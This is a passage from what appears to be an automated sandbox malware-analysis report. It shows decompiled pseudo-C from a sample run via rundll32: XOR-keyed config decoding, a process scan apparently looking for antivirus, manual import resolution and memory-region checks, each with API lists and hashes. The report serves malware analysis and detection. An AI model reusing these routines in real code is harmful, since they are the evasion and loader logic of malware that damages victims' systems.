                                      						_t104 =  &_v8;
                                      						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                      							 *0x44ba2e0 = _v8;
                                      						}
                                      					}
                                      					if(_t102 == 0) {
                                      						_t46 = 0;
                                      					} else {
                                      						_t94 =  *0x44ba344; // 0x69b25f44
                                      						_t46 = E044B5450(_t104, _t102, _t94 ^ 0x219b08c7);
                                      					}
                                      					if(_t46 != 0) {
                                      						_t104 =  &_v8;
                                      						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                      							 *0x44ba2e4 = _v8;
                                      						}
                                      					}
                                      					if(_t102 == 0) {
                                      						_t47 = 0;
                                      					} else {
                                      						_t90 =  *0x44ba344; // 0x69b25f44
                                      						_t47 = E044B5450(_t104, _t102, _t90 ^ 0x31fc0661);
                                      					}
                                      					if(_t47 != 0) {
                                      						_t104 =  &_v8;
                                      						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                      							 *0x44ba2e8 = _v8;
                                      						}
                                      					}
                                      					if(_t102 == 0) {
                                      						_t48 = 0;
                                      					} else {
                                      						_t86 =  *0x44ba344; // 0x69b25f44
                                      						_t48 = E044B5450(_t104, _t102, _t86 ^ 0x0cd926ce);
                                      					}
                                      					if(_t48 != 0) {
                                      						_t104 =  &_v8;
                                      						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                      							 *0x44ba004 = _v8;
                                      						}
                                      					}
                                      					if(_t102 == 0) {
                                      						_t49 = 0;
                                      					} else {
                                      						_t82 =  *0x44ba344; // 0x69b25f44
                                      						_t49 = E044B5450(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                                      					}
                                      					if(_t49 != 0) {
                                      						_t104 =  &_v8;
                                      						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                      							 *0x44ba02c = _v8;
                                      						}
                                      					}
                                      					if(_t102 == 0) {
                                      						_t50 = 0;
                                      					} else {
                                      						_t78 =  *0x44ba344; // 0x69b25f44
                                      						_t50 = E044B5450(_t104, _t102, _t78 ^ 0x2878b929);
                                      					}
                                      					if(_t50 == 0) {
                                      						L41:
                                      						 *0x44ba2ec = 5;
                                      						goto L42;
                                      					} else {
                                      						_t104 =  &_v8;
                                      						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                      							goto L41;
                                      						} else {
                                      							L42:
                                      							if(_t102 == 0) {
                                      								_t51 = 0;
                                      							} else {
                                      								_t75 =  *0x44ba344; // 0x69b25f44
                                      								_t51 = E044B5450(_t104, _t102, _t75 ^ 0x261a367a);
                                      							}
                                      							if(_t51 != 0) {
                                      								_push(_t51);
                                      								_t72 = 0x10;
                                      								_t73 = E044B2FBC(_t72);
                                      								if(_t73 != 0) {
                                      									_push(_t73);
                                      									E044B72C7();
                                      								}
                                      							}
                                      							if(_t102 == 0) {
                                      								_t52 = 0;
                                      							} else {
                                      								_t70 =  *0x44ba344; // 0x69b25f44
                                      								_t52 = E044B5450(_t104, _t102, _t70 ^ 0xb9d404b2);
                                      							}
                                      							if(_t52 != 0 && E044B2FBC(0, _t52) != 0) {
                                      								_t121 =  *0x44ba3cc; // 0x4e695b0
                                      								E044B765B(_t121 + 4, _t68);
                                      							}
                                      							if(_t102 == 0) {
                                      								_t53 = 0;
                                      							} else {
                                      								_t65 =  *0x44ba344; // 0x69b25f44
                                      								_t53 = E044B5450(_t104, _t102, _t65 ^ 0x3df17130);
                                      							}
                                      							if(_t53 == 0) {
                                      								L59:
                                      								_t54 =  *0x44ba348; // 0x9ad5a8
                                      								_t22 = _t54 + 0x44bb252; // 0x616d692f
                                      								 *0x44ba374 = _t22;
                                      								goto L60;
                                      							} else {
                                      								_t64 = E044B2FBC(0, _t53);
                                      								 *0x44ba374 = _t64;
                                      								if(_t64 != 0) {
                                      									L60:
                                      									if(_t102 == 0) {
                                      										_t56 = 0;
                                      									} else {
                                      										_t61 =  *0x44ba344; // 0x69b25f44
                                      										_t56 = E044B5450(_t104, _t102, _t61 ^ 0xd2079859);
                                      									}
                                      									if(_t56 == 0) {
                                      										_t57 =  *0x44ba348; // 0x9ad5a8
                                      										_t23 = _t57 + 0x44bb79e; // 0x6976612e
                                      										_t58 = _t23;
                                      									} else {
                                      										_t58 = E044B2FBC(0, _t56);
                                      									}
                                      									 *0x44ba3e0 = _t58;
                                      									HeapFree( *0x44ba2d8, 0, _t102);
                                      									_v12 = 0;
                                      									goto L67;
                                      								}
                                      								goto L59;
                                      							}
                                      						}
                                      					}
                                      				}
                                      			}

                                      APIs
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,044BA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 044B16EA
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,044BA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 044B171C
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,044BA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 044B174E
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,044BA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 044B1780
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,044BA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 044B17B2
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,044BA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 044B17E4
                                      • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 044B18E3
                                      • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 044B18F7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: be01c45b42132e1d6cc2ad766e0f16fbcf99d8d90f357c7be8204fc4b288b68f
                                      • Instruction ID: 8149241481731283e1e930a61fe8271049faca54e79e4987627d5a56fde41940
                                      • Opcode Fuzzy Hash: be01c45b42132e1d6cc2ad766e0f16fbcf99d8d90f357c7be8204fc4b288b68f
                                      • Instruction Fuzzy Hash: 1681A174B00604ABEF11DBB9D998DDB77EDEB48684724092BA481E3201FA39FD4197F0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00402495(long _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				signed int _v16;
                                      				short* _v32;
                                      				void _v36;
                                      				void* _t57;
                                      				signed int _t58;
                                      				signed int _t61;
                                      				signed int _t62;
                                      				void* _t63;
                                      				signed int* _t68;
                                      				intOrPtr* _t69;
                                      				intOrPtr* _t71;
                                      				intOrPtr _t72;
                                      				intOrPtr _t75;
                                      				void* _t76;
                                      				signed int _t77;
                                      				void* _t78;
                                      				void _t80;
                                      				signed int _t81;
                                      				signed int _t84;
                                      				signed int _t86;
                                      				short* _t87;
                                      				void* _t89;
                                      				signed int* _t90;
                                      				long _t91;
                                      				signed int _t93;
                                      				signed int _t94;
                                      				signed int _t100;
                                      				signed int _t102;
                                      				void* _t104;
                                      				long _t108;
                                      				signed int _t110;
                                      
                                      				_t108 = _a4;
                                      				_t76 =  *(_t108 + 8);
                                      				if((_t76 & 0x00000003) != 0) {
                                      					L3:
                                      					return 0;
                                      				}
                                      				_a4 =  *[fs:0x4];
                                      				_v8 =  *[fs:0x8];
                                      				if(_t76 < _v8 || _t76 >= _a4) {
                                      					_t102 =  *(_t108 + 0xc);
                                      					__eflags = _t102 - 0xffffffff;
                                      					if(_t102 != 0xffffffff) {
                                      						_t91 = 0;
                                      						__eflags = 0;
                                      						_a4 = 0;
                                      						_t57 = _t76;
                                      						do {
                                      							_t80 =  *_t57;
                                      							__eflags = _t80 - 0xffffffff;
                                      							if(_t80 == 0xffffffff) {
                                      								goto L9;
                                      							}
                                      							__eflags = _t80 - _t91;
                                      							if(_t80 >= _t91) {
                                      								L20:
                                      								_t63 = 0;
                                      								L60:
                                      								return _t63;
                                      							}
                                      							L9:
                                      							__eflags =  *(_t57 + 4);
                                      							if( *(_t57 + 4) != 0) {
                                      								_t12 =  &_a4;
                                      								 *_t12 = _a4 + 1;
                                      								__eflags =  *_t12;
                                      							}
                                      							_t91 = _t91 + 1;
                                      							_t57 = _t57 + 0xc;
                                      							__eflags = _t91 - _t102;
                                      						} while (_t91 <= _t102);
                                      						__eflags = _a4;
                                      						if(_a4 == 0) {
                                      							L15:
                                      							_t81 =  *0x4041f8;
                                      							_t110 = _t76 & 0xfffff000;
                                      							_t58 = 0;
                                      							__eflags = _t81;
                                      							if(_t81 <= 0) {
                                      								L18:
                                      								_t104 = _t102 | 0xffffffff;
                                      								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                      								__eflags = _t61;
                                      								if(_t61 < 0) {
                                      									_t62 = 0;
                                      									__eflags = 0;
                                      								} else {
                                      									_t62 = _a4;
                                      								}
                                      								__eflags = _t62;
                                      								if(_t62 == 0) {
                                      									L59:
                                      									_t63 = _t104;
                                      									goto L60;
                                      								} else {
                                      									__eflags = _v12 - 0x1000000;
                                      									if(_v12 != 0x1000000) {
                                      										goto L59;
                                      									}
                                      									__eflags = _v16 & 0x000000cc;
                                      									if((_v16 & 0x000000cc) == 0) {
                                      										L46:
                                      										_t63 = 1;
                                      										 *0x404240 = 1;
                                      										__eflags =  *0x404240;
                                      										if( *0x404240 != 0) {
                                      											goto L60;
                                      										}
                                      										_t84 =  *0x4041f8;
                                      										__eflags = _t84;
                                      										_t93 = _t84;
                                      										if(_t84 <= 0) {
                                      											L51:
                                      											__eflags = _t93;
                                      											if(_t93 != 0) {
                                      												L58:
                                      												 *0x404240 = 0;
                                      												goto L5;
                                      											}
                                      											_t77 = 0xf;
                                      											__eflags = _t84 - _t77;
                                      											if(_t84 <= _t77) {
                                      												_t77 = _t84;
                                      											}
                                      											_t94 = 0;
                                      											__eflags = _t77;
                                      											if(_t77 < 0) {
                                      												L56:
                                      												__eflags = _t84 - 0x10;
                                      												if(_t84 < 0x10) {
                                      													_t86 = _t84 + 1;
                                      													__eflags = _t86;
                                      													 *0x4041f8 = _t86;
                                      												}
                                      												goto L58;
                                      											} else {
                                      												do {
                                      													_t68 = 0x404200 + _t94 * 4;
                                      													_t94 = _t94 + 1;
                                      													__eflags = _t94 - _t77;
                                      													 *_t68 = _t110;
                                      													_t110 =  *_t68;
                                      												} while (_t94 <= _t77);
                                      												goto L56;
                                      											}
                                      										}
                                      										_t69 = 0x4041fc + _t84 * 4;
                                      										while(1) {
                                      											__eflags =  *_t69 - _t110;
                                      											if( *_t69 == _t110) {
                                      												goto L51;
                                      											}
                                      											_t93 = _t93 - 1;
                                      											_t69 = _t69 - 4;
                                      											__eflags = _t93;
                                      											if(_t93 > 0) {
                                      												continue;
                                      											}
                                      											goto L51;
                                      										}
                                      										goto L51;
                                      									}
                                      									_t87 = _v32;
                                      									__eflags =  *_t87 - 0x5a4d;
                                      									if( *_t87 != 0x5a4d) {
                                      										goto L59;
                                      									}
                                      									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                      									__eflags =  *_t71 - 0x4550;
                                      									if( *_t71 != 0x4550) {
                                      										goto L59;
                                      									}
                                      									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                      									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                      										goto L59;
                                      									}
                                      									_t78 = _t76 - _t87;
                                      									__eflags =  *((short*)(_t71 + 6));
                                      									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                      									if( *((short*)(_t71 + 6)) <= 0) {
                                      										goto L59;
                                      									}
                                      									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                      									__eflags = _t78 - _t72;
                                      									if(_t78 < _t72) {
                                      										goto L46;
                                      									}
                                      									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                      									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                      										goto L46;
                                      									}
                                      									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                      									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                      										goto L20;
                                      									}
                                      									goto L46;
                                      								}
                                      							} else {
                                      								goto L16;
                                      							}
                                      							while(1) {
                                      								L16:
                                      								__eflags =  *((intOrPtr*)(0x404200 + _t58 * 4)) - _t110;
                                      								if( *((intOrPtr*)(0x404200 + _t58 * 4)) == _t110) {
                                      									break;
                                      								}
                                      								_t58 = _t58 + 1;
                                      								__eflags = _t58 - _t81;
                                      								if(_t58 < _t81) {
                                      									continue;
                                      								}
                                      								goto L18;
                                      							}
                                      							__eflags = _t58;
                                      							if(_t58 <= 0) {
                                      								goto L5;
                                      							}
                                      							 *0x404240 = 1;
                                      							__eflags =  *0x404240;
                                      							if( *0x404240 != 0) {
                                      								goto L5;
                                      							}
                                      							__eflags =  *((intOrPtr*)(0x404200 + _t58 * 4)) - _t110;
                                      							if( *((intOrPtr*)(0x404200 + _t58 * 4)) == _t110) {
                                      								L32:
                                      								_t100 = 0;
                                      								__eflags = _t58;
                                      								if(_t58 < 0) {
                                      									L34:
                                      									 *0x404240 = 0;
                                      									goto L5;
                                      								} else {
                                      									goto L33;
                                      								}
                                      								do {
                                      									L33:
                                      									_t90 = 0x404200 + _t100 * 4;
                                      									_t100 = _t100 + 1;
                                      									__eflags = _t100 - _t58;
                                      									 *_t90 = _t110;
                                      									_t110 =  *_t90;
                                      								} while (_t100 <= _t58);
                                      								goto L34;
                                      							}
                                      							_t58 = _t81 - 1;
                                      							__eflags = _t58;
                                      							if(_t58 < 0) {
                                      								L28:
                                      								__eflags = _t81 - 0x10;
                                      								if(_t81 < 0x10) {
                                      									_t81 = _t81 + 1;
                                      									__eflags = _t81;
                                      									 *0x4041f8 = _t81;
                                      								}
                                      								_t58 = _t81 - 1;
                                      								goto L32;
                                      							} else {
                                      								goto L25;
                                      							}
                                      							while(1) {
                                      								L25:
                                      								__eflags =  *((intOrPtr*)(0x404200 + _t58 * 4)) - _t110;
                                      								if( *((intOrPtr*)(0x404200 + _t58 * 4)) == _t110) {
                                      									break;
                                      								}
                                      								_t58 = _t58 - 1;
                                      								__eflags = _t58;
                                      								if(_t58 >= 0) {
                                      									continue;
                                      								}
                                      								break;
                                      							}
                                      							__eflags = _t58;
                                      							if(__eflags >= 0) {
                                      								if(__eflags == 0) {
                                      									goto L34;
                                      								}
                                      								goto L32;
                                      							}
                                      							goto L28;
                                      						}
                                      						_t75 =  *((intOrPtr*)(_t108 - 8));
                                      						__eflags = _t75 - _v8;
                                      						if(_t75 < _v8) {
                                      							goto L20;
                                      						}
                                      						__eflags = _t75 - _t108;
                                      						if(_t75 >= _t108) {
                                      							goto L20;
                                      						}
                                      						goto L15;
                                      					}
                                      					L5:
                                      					_t63 = 1;
                                      					goto L60;
                                      				} else {
                                      					goto L3;
                                      				}
                                      			}





































                                      APIs
                                      • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00402546
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: MemoryQueryVirtual
                                      • String ID: @B@$@B@$@B@
                                      • API String ID: 2850889275-824135644
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E044B68BD() {
                                      				char _v264;
                                      				void* _v300;
                                      				int _t8;
                                      				intOrPtr _t9;
                                      				int _t15;
                                      				void* _t17;
                                      
                                      				_t15 = 0;
                                      				_t17 = CreateToolhelp32Snapshot(2, 0);
                                      				if(_t17 != 0) {
                                      					_t8 = Process32First(_t17,  &_v300);
                                      					while(_t8 != 0) {
                                      						_t9 =  *0x44ba348; // 0x9ad5a8
                                      						_t2 = _t9 + 0x44bbeb0; // 0x73617661
                                      						_push( &_v264);
                                      						if( *0x44ba12c() != 0) {
                                      							_t15 = 1;
                                      						} else {
                                      							_t8 = Process32Next(_t17,  &_v300);
                                      							continue;
                                      						}
                                      						L7:
                                      						CloseHandle(_t17);
                                      						goto L8;
                                      					}
                                      					goto L7;
                                      				}
                                      				L8:
                                      				return _t15;
                                      			}










                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 044B68CD
                                      • Process32First.KERNEL32(00000000,?), ref: 044B68E0
                                      • Process32Next.KERNEL32(00000000,?), ref: 044B690C
                                      • CloseHandle.KERNEL32(00000000), ref: 044B691B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004010C4() {
                                      				void* _t1;
                                      				unsigned int _t3;
                                      				void* _t4;
                                      				long _t5;
                                      				void* _t6;
                                      				intOrPtr _t10;
                                      				void* _t14;
                                      
                                      				_t10 =  *0x4041b0;
                                      				_t1 = CreateEventA(0, 1, 0, 0);
                                      				 *0x4041bc = _t1;
                                      				if(_t1 == 0) {
                                      					return GetLastError();
                                      				}
                                      				_t3 = GetVersion();
                                      				if(_t3 != 5) {
                                      					L4:
                                      					if(_t14 <= 0) {
                                      						_t4 = 0x32;
                                      						return _t4;
                                      					} else {
                                      						goto L5;
                                      					}
                                      				} else {
                                      					if(_t3 >> 8 > 0) {
                                      						L5:
                                      						 *0x4041ac = _t3;
                                      						_t5 = GetCurrentProcessId();
                                      						 *0x4041a8 = _t5;
                                      						 *0x4041b0 = _t10;
                                      						_t6 = OpenProcess(0x10047a, 0, _t5);
                                      						 *0x4041a4 = _t6;
                                      						if(_t6 == 0) {
                                      							 *0x4041a4 =  *0x4041a4 | 0xffffffff;
                                      						}
                                      						return 0;
                                      					} else {
                                      						_t14 = _t3 - _t3;
                                      						goto L4;
                                      					}
                                      				}
                                      			}











                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401313), ref: 004010D3
                                      • GetVersion.KERNEL32 ref: 004010E2
                                      • GetCurrentProcessId.KERNEL32 ref: 004010FE
                                      • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401117
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: Process$CreateCurrentEventOpenVersion
                                      • String ID:
                                      • API String ID: 845504543-0
                                      • Opcode ID: 102ce236176b549a1484aa23b8b0d4a06e4d791476afa87c9ec593d6a2c25211
                                      • Instruction ID: 740f7ac852a26ca891ddde8504c2c6e536540062a9b0e58a564806d0cc3295d2
                                      • Opcode Fuzzy Hash: 102ce236176b549a1484aa23b8b0d4a06e4d791476afa87c9ec593d6a2c25211
                                      • Instruction Fuzzy Hash: D1F08CB0645300ABEB209F68BE197563FA8A799712F04413AE741FE2F8D3B485818B4C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004015E3(void* __edi, intOrPtr _a4) {
                                      				signed int _v8;
                                      				intOrPtr* _v12;
                                      				_Unknown_base(*)()** _v16;
                                      				signed int _v20;
                                      				signed short _v24;
                                      				struct HINSTANCE__* _v28;
                                      				intOrPtr _t43;
                                      				intOrPtr* _t45;
                                      				intOrPtr _t46;
                                      				struct HINSTANCE__* _t47;
                                      				intOrPtr* _t49;
                                      				intOrPtr _t50;
                                      				signed short _t51;
                                      				_Unknown_base(*)()* _t53;
                                      				CHAR* _t54;
                                      				_Unknown_base(*)()* _t55;
                                      				void* _t58;
                                      				signed int _t59;
                                      				_Unknown_base(*)()* _t60;
                                      				intOrPtr _t61;
                                      				intOrPtr _t65;
                                      				signed int _t68;
                                      				void* _t69;
                                      				CHAR* _t71;
                                      				signed short* _t73;
                                      
                                      				_t69 = __edi;
                                      				_v20 = _v20 & 0x00000000;
                                      				_t59 =  *0x4041c0;
                                      				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                      				if(_t43 != 0) {
                                      					_t45 = _t43 + __edi;
                                      					_v12 = _t45;
                                      					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                      					if(_t46 != 0) {
                                      						while(1) {
                                      							_t71 = _t46 + _t69;
                                      							_t47 = LoadLibraryA(_t71);
                                      							_v28 = _t47;
                                      							if(_t47 == 0) {
                                      								break;
                                      							}
                                      							_v24 = _v24 & 0x00000000;
                                      							 *_t71 = _t59 - 0x69b25f44;
                                      							_t49 = _v12;
                                      							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                      							_t50 =  *_t49;
                                      							if(_t50 != 0) {
                                      								L6:
                                      								_t73 = _t50 + _t69;
                                      								_v16 = _t61 + _t69;
                                      								while(1) {
                                      									_t51 =  *_t73;
                                      									if(_t51 == 0) {
                                      										break;
                                      									}
                                      									if(__eflags < 0) {
                                      										__eflags = _t51 - _t69;
                                      										if(_t51 < _t69) {
                                      											L12:
                                      											_t21 =  &_v8;
                                      											 *_t21 = _v8 & 0x00000000;
                                      											__eflags =  *_t21;
                                      											_v24 =  *_t73 & 0x0000ffff;
                                      										} else {
                                      											_t65 = _a4;
                                      											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                      											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                      												goto L12;
                                      											} else {
                                      												goto L11;
                                      											}
                                      										}
                                      									} else {
                                      										_t51 = _t51 + _t69;
                                      										L11:
                                      										_v8 = _t51;
                                      									}
                                      									_t53 = _v8;
                                      									__eflags = _t53;
                                      									if(_t53 == 0) {
                                      										_t54 = _v24 & 0x0000ffff;
                                      									} else {
                                      										_t54 = _t53 + 2;
                                      									}
                                      									_t55 = GetProcAddress(_v28, _t54);
                                      									__eflags = _t55;
                                      									if(__eflags == 0) {
                                      										_v20 = _t59 - 0x69b25ec5;
                                      									} else {
                                      										_t68 = _v8;
                                      										__eflags = _t68;
                                      										if(_t68 != 0) {
                                      											 *_t68 = _t59 - 0x69b25f44;
                                      										}
                                      										 *_v16 = _t55;
                                      										_t58 = 0x593682f4 + _t59 * 4;
                                      										_t73 = _t73 + _t58;
                                      										_t32 =  &_v16;
                                      										 *_t32 = _v16 + _t58;
                                      										__eflags =  *_t32;
                                      										continue;
                                      									}
                                      									goto L23;
                                      								}
                                      							} else {
                                      								_t50 = _t61;
                                      								if(_t61 != 0) {
                                      									goto L6;
                                      								}
                                      							}
                                      							L23:
                                      							_v12 = _v12 + 0x14;
                                      							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                      							if(_t46 != 0) {
                                      								continue;
                                      							} else {
                                      							}
                                      							L26:
                                      							goto L27;
                                      						}
                                      						_t60 = _t59 + 0x964da13a;
                                      						__eflags = _t60;
                                      						_v20 = _t60;
                                      						goto L26;
                                      					}
                                      				}
                                      				L27:
                                      				return _v20;
                                      			}





























                                      APIs
                                      • LoadLibraryA.KERNEL32(?,?,00000000,?,0040159A), ref: 0040161B
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0040168D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID:
                                      • API String ID: 2574300362-0
                                      • Opcode ID: 424bc5bbea111a8b14d5dcae703d52492c2e45c79eda0825660022e00faa5703
                                      • Instruction ID: b6ce0f3373bfba93720632a760a03fc5b28e1e0d61573c882b4019fd40126a1f
                                      • Opcode Fuzzy Hash: 424bc5bbea111a8b14d5dcae703d52492c2e45c79eda0825660022e00faa5703
                                      • Instruction Fuzzy Hash: 02314971A01206DBCB10CF95CC94AAEB7F9BF54304F18497AD801EB3A0E73ADA41CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 49%
                                      			E044B4BF1(void* __ecx, intOrPtr* _a4) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				void _v76;
                                      				intOrPtr* _t226;
                                      				signed int _t229;
                                      				signed int _t231;
                                      				signed int _t233;
                                      				signed int _t235;
                                      				signed int _t237;
                                      				signed int _t239;
                                      				signed int _t241;
                                      				signed int _t243;
                                      				signed int _t245;
                                      				signed int _t247;
                                      				signed int _t249;
                                      				signed int _t251;
                                      				signed int _t253;
                                      				signed int _t255;
                                      				signed int _t257;
                                      				signed int _t259;
                                      				signed int _t338;
                                      				signed char* _t348;
                                      				signed int _t349;
                                      				signed int _t351;
                                      				signed int _t353;
                                      				signed int _t355;
                                      				signed int _t357;
                                      				signed int _t359;
                                      				signed int _t361;
                                      				signed int _t363;
                                      				signed int _t365;
                                      				signed int _t367;
                                      				signed int _t376;
                                      				signed int _t378;
                                      				signed int _t380;
                                      				signed int _t382;
                                      				signed int _t384;
                                      				intOrPtr* _t400;
                                      				signed int* _t401;
                                      				signed int _t402;
                                      				signed int _t404;
                                      				signed int _t406;
                                      				signed int _t408;
                                      				signed int _t410;
                                      				signed int _t412;
                                      				signed int _t414;
                                      				signed int _t416;
                                      				signed int _t418;
                                      				signed int _t420;
                                      				signed int _t422;
                                      				signed int _t424;
                                      				signed int _t432;
                                      				signed int _t434;
                                      				signed int _t436;
                                      				signed int _t438;
                                      				signed int _t440;
                                      				signed int _t508;
                                      				signed int _t599;
                                      				signed int _t607;
                                      				signed int _t613;
                                      				signed int _t679;
                                      				void* _t682;
                                      				signed int _t683;
                                      				signed int _t685;
                                      				signed int _t690;
                                      				signed int _t692;
                                      				signed int _t697;
                                      				signed int _t699;
                                      				signed int _t718;
                                      				signed int _t720;
                                      				signed int _t722;
                                      				signed int _t724;
                                      				signed int _t726;
                                      				signed int _t728;
                                      				signed int _t734;
                                      				signed int _t740;
                                      				signed int _t742;
                                      				signed int _t744;
                                      				signed int _t746;
                                      				signed int _t748;
                                      
                                      				_t226 = _a4;
                                      				_t348 = __ecx + 2;
                                      				_t401 =  &_v76;
                                      				_t682 = 0x10;
                                      				do {
                                      					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                      					_t401 =  &(_t401[1]);
